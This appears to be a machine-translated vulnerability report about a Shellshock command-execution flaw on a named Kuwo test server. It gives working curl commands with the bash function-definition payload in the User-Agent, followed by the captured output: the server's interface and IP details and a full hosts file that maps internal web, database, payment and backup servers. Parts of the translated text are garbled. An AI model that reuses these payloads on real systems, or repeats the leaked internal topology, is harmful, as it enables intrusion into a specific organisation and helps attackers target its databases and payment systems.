Cool music command execution on a site
Cool-me command execution on a site
Managetest.kuwo.cn bash Command Execution Vulnerability
Curl-A "() {foo;}; echo;/sbin/ifconfig" http://managetest.kuwo.cn/cgi-bin/test-cgi
Eth0 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 38
Inet addr: 60.28.205.41 Bcast: 60.28.205.63 Mask: too many bytes
Inet6 addr: fe80: 21a: a0ff: fe0d: fb38/64 Scope: Link
Up broadcast running multicast mtu: 1500 Metric: 1
RX packets: 1150352590 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 2511972745 errors: 0 dropped: 0 overruns: 0 carrier: 0
Collisions: 0 FIG: 1000
RX bytes: 228359309665 (212.6 GiB) TX bytes: 972996034118 (906.1 GiB)
Interrupt: 169 Memory: f4000000-f4011100
Eth0: 1 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 38
Inet addr: 60.28.205.48 Bcast: 60.28.205.63 Mask: too many bytes
Up broadcast running multicast mtu: 1500 Metric: 1
Interrupt: 169 Memory: f4000000-f4011100
Eth1 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 36
Inet addr: 192.168.0.42 Bcast: 192.168.255.255 Mask: 255.255.255.0.0
Inet6 addr: fe80: 21a: a0ff: fe0d: fb36/64 Scope: Link
Up broadcast running multicast mtu: 1500 Metric: 1
RX packets: 7819254624 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 11484217788 errors: 0 dropped: 0 overruns: 0 carrier: 0
Collisions: 0 FIG: 1000
RX bytes: 3514910215382 (3.1 TiB) TX bytes: 14712204358111 (13.3 TiB)
Interrupt: 169 Memory: f8000000-f8011100
Eth1: 0 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 36
Inet addr: 192.168.0.136 Bcast: 192.168.255.255 Mask: 255.255.255.0.0
Up broadcast running multicast mtu: 1500 Metric: 1
Interrupt: 169 Memory: f8000000-f8011100
Eth1: 1 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 36
Inet addr: 192.168.0.139 Bcast: 192.168.255.255 Mask: 255.255.255.0.0
Up broadcast running multicast mtu: 1500 Metric: 1
Interrupt: 169 Memory: f8000000-f8011100
Lo Link encap: Local Loopback
Inet addr: 127.0.0.1 Mask: 255.0.0.0
Inet6 addr: 1/128 Scope: Host
Up loopback running mtu: 16436 Metric: 1
RX packets: 111515227 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 111515227 errors: 0 dropped: 0 overruns: 0 carrier: 0
Collisions: 0 txqueuelen: 0
RX bytes: 66706130576 (62.1 GiB) TX bytes: 66706130576 (62.1 GiB)
Lo: 0 Link encap: Local Loopback
Inet addr: 60.28.205.61 Mask: 255.255.255.255
Up loopback running mtu: 16436 Metric: 1
Lo: 1 Link encap: Local Loopback
Inet addr: 60.28.193.246 Mask: 255.255.255.255
Up loopback running mtu: 16436 Metric: 1
Lo: 2 Link encap: Local Loopback
Inet addr: 127.0.0.2 Mask: 255.0.0.0
Up loopback running mtu: 16436 Metric: 1
Curl-A "() {foo ;}; echo;/bin/cat/etc/hosts" http://managetest.kuwo.cn/cgi-bin/test-cgi
# Do not remove the following line, or various programs
# That require network functionality will fail.
127.0.0.1backup42.com backup42 localhost
127.0.0.1 image.kuwo.cn
#127.0.0.1 star.kuwo.cn
192.168.1.120 s120
192.168.0.80 lyric80
192.168.0.82 lyric82
192.168.0.81 lyric81
192.168.0.88 lyric88
192.168.0.96 lyric96
192.168.0.97 lyric97
60.29.226.181 www.kuwo.cn
60.29.226.181 kzone.kuwo.cn
192.168.0.248 bkserver248
192.168.0.187 bkserver187
192.168.0.179 bkserver179
192.168.0.169 bkserver169
192.168.0.170 bkserver170
192.168.210.240 bkserver240
192.168.0.190 bkserver190
192.168.0.43 bkserver43
192.168.0.174 bkserver174
192.168.0.39 bkserver39
192.168.0.40 bkserver40
192.168.217.183 bkserver183
192.168.0.189 bkserver189
192.168.0.26 bkserver26
#192.168.210.85 bkserver85
192.168.210.71 bkserver85
192.168.0.56 bkserver56
60.28.199.29 bkserver29
60.28.210.125 bkserver125
#60.28.205.61 nplserver.kuwo.cn
# 60.28.205.41fang1.koowo.com
# 60.28.205.41fang2.koowo.com
# 60.28.205.41fang.koowo.com
127.0.0.1 test41.kuwo.cn
127.0.0.1 ksingservice.kuwo.cn
# 127.0.0.1star.kuwo.cn
# 127.0.0.1mv.koowo.com
# 60.28.205.48fang1.koowo.com
# 60.28.205.48fang2.koowo.com
# 60.28.205.48fang.koowo.com
127.0.0.1fang1.koowo.com
127.0.0.1fang2.koowo.com
127.0.0.1fang.koowo.com
#60.28.205.41 www.kuwo.cn
#221.238.18.39 kzone.kuwo.cn
#60.29.225.24 kzone.kuwo.cn
60.28.205.48kzone48.koowo.com
60.28.205.48kzone48.kuwo.cn
# 60.28.205.48star.koowo.com
# The following settings are for koowo web develop
127.0.0.1mainwebserver
192.168.0.174 mainwebserver_T
# Web servers
192.168.0.42localwebserver
192.168.0.57otherwebserver1
192.168.0.188otherwebserver2
192.168.0.184 otherwebserver3
192.168.217.171 otherwebserver4
192.168.0.74 otherwebserver5
192.168.201.12 otherwebserver6
192.168.217.185 otherwebserver7
192.168.217.168 ucmwebserver1
192.168.217.173 ucmwebserver2
# Backend servers
192.168.0.169lhserver
192.168.0.169scoreserver
192.168.0.169loginserver
192.168.0.169guestserver
192.168.0.169musicstatserver
192.168.0.49 l1_kserver
60.28.205.41profilecacheserver
192.168.0.21profileoscacheserver
192.168.0.21usercacheserver
192.168.0.187newsserver
192.168.0.187 activityserver
192.168.206.247 reslist.kuwo.cn
192.168.0.80 shouji.kuwo.cn
# Databases
192.168.0.185 queryservereditor
192.168.0.185 queryserver185
192.168.201.44 queryserver44
192.168.0.185 queryservermlog
192.168.0.186 queryserver186
#192.168.0.42 queryserver186
192.168.0.42 queryserver41
192.168.0.188 queryserver188
192.168.0.185queryserver46
192.168.0.177queryserver177
192.168.210.76vipuserdatabaseserver
192.168.0.169 queryserver43
192.168.201.43 queryserver20143
192.168.0.189 queryserver189
#192.168.217.171 queryserver171
#192.168.210.104 queryserver171
192.168.226.167 queryserver171
60.29.226.168 queryserver190
192.168.217.171 queryserver74
192.168.201.16 queryserver16
192.168.201.17 queryserver17
192.168.10.50 queryserver50
192.168.10.51 queryserver51
192.168.210.125 queryserver87
#221.238.18.45 huangfan.kuwo.cn
60.28.204.156 huangfan.kuwo.cn
60.28.205.38 koowo.com
60.28.205.38 kuwo.cn
60.217.32.231 mail.koowo.cn
60.217.32.233 mail.kuwomail.com
192.168.199.24 queryserver29
192.168.0.42 local.kuwo.cn
#60.29.226.174 search.kuwo.cn
#192.168.0.53 search.kuwo.cn
#192.168.0.53 search.koowo.com
192.168.0.54 search.koowo.com
192.168.210.106 search.kuwo.cn
60.28.205.41 player.kuwo.cn
127.0.0.1 dh.kuwo.cn
60.28.205.57 css.kuwo.cn
#60.28.205.56 tips.kuwo.cn
60.28.205.39 data.search.kuwo.cn
#60.28.205.39 search.kuwo.cn
#192.168.0.53 search.koowo.com
#192.168.0.53 search.kuwo.cn
#60.29.226.174 search.kuwo.cn
#60.29.226.174 search.koowo.com
#192.168.0.146 nplserver.kuwo.cn
60.28.205.39 lyric.koowo.com
60.28.205.39 lyric.kuwo.cn
60.28.205.39 newlyric.koowo.com
60.28.205.39 newlyric.kuwo.cn
60.28.199.29 topmusic.kuwo.cn
60.28.199.24 queryserver24
218.27.132.18 mp3dl.cdn.kuwo.cn
# Test env for dj backend
#60.28.193.252 gyhserver1.kuwo.cn
# Kuwolive
# 60.28.201.38antiserver.kuwo.cn
#192.168.0.181 antiserver.kuwo.cn
#192.168.0.170 antiserver.kuwo.cn
#192.168.206.247 antiserver.kuwo.cn
192.168.195.120 antiserver.kuwo.cn
192.168.217.188 nksingserver.kuwo.cn
# Game history
192.168.217.174 gamehistoryserver.kuwo.cn
#60.29.244.181 user.hvsop.cn
60.28.201.5puppet.kuwo.cn
192.168.201.38 updateedit.kuwo.cn
# For zadan test
127.0.0.1 topic.kuwo.cn
127.0.0.1 pc.kuwo.cn
60.28.210.68 mobi.kuwo.cn
192.168.210.76 pay-master.db.kuwo.cn
192.168.226.167 pay-slave.db.kuwo.cn
192.168.201.30 pay-backup.db.kuwo.cn
192.168.210.76 vip-master.db.kuwo.cn
192.168.226.167 vip-slave.db.kuwo.cn
192.168.201.30 vip-backup.db.kuwo.cn
192.168...43 vip-test.db.kuwo.cn
192.168.210.74 queryserverdd
#60.28.210.114 zhiboserver.kuwo.cn
#60.28.201.37 x.kuwo.cn
Content-type: text/plain; charset = iso-8859-1
Solution:
I cannot delete test-cgi.